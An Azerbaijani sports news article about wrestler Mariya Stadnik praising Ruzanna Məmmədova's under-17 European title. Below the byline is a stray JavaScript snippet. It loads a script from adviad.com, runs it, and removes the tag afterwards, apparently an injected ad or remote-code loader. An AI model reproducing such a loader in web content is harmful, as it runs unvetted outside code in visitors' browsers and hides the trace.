Mariya Stadnik öz çəkisində Avropa çempionu olan güləşçimizi təbrik etdi – FOTO/VİDEO

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

“Gənc qızlarımızı dəstəklədiyim üçün təşəkkür mesajları aldım”.

Oxu.Az-ın xəbərinə görə, bunu güləş üzrə dördqat Olimpiya mükafatçısı, ikiqat dünya və səkkizqat Avropa çempionu Mariya Stadnik deyib.

O, Rumıniyanın paytaxtı Buxarestdə keçirilmiş 17 yaşadək güləşçilərin Avropa çempionatında qızıl medal qazanmış Ruzanna Məmmədova ilə bağlı paylaşım edib:

“Allaha şükürlər olsun ki, öz nümunəmlə gənc idmançıları yaxşı, düzgün iş görməyə sövq edirəm. Onları nəinki məşq etdirən, həm də yaşadan və onların işindən həzz alan məşqçilərə təşəkkür edirəm. Və nəticələr doğru yolda olduğumuzu göstərir”.

Qeyd edək ki, Ruzanna Məmmədova Mariya Stadnikin çəkisində güləşib. O, 49 kq çəki dərəcəsində Avropa çempionatında güləşib. Ruzanna məğlub etdiyi dörd rəqibindən üçünə “tuşe” (kürəyi döşəyə sıxmaqla vaxtından erkən qələbə) ilə qalib gəlib və Avropa çempionu olub.

Səbuhi Musa

Oxu.az

Bu yazılara da göz atın...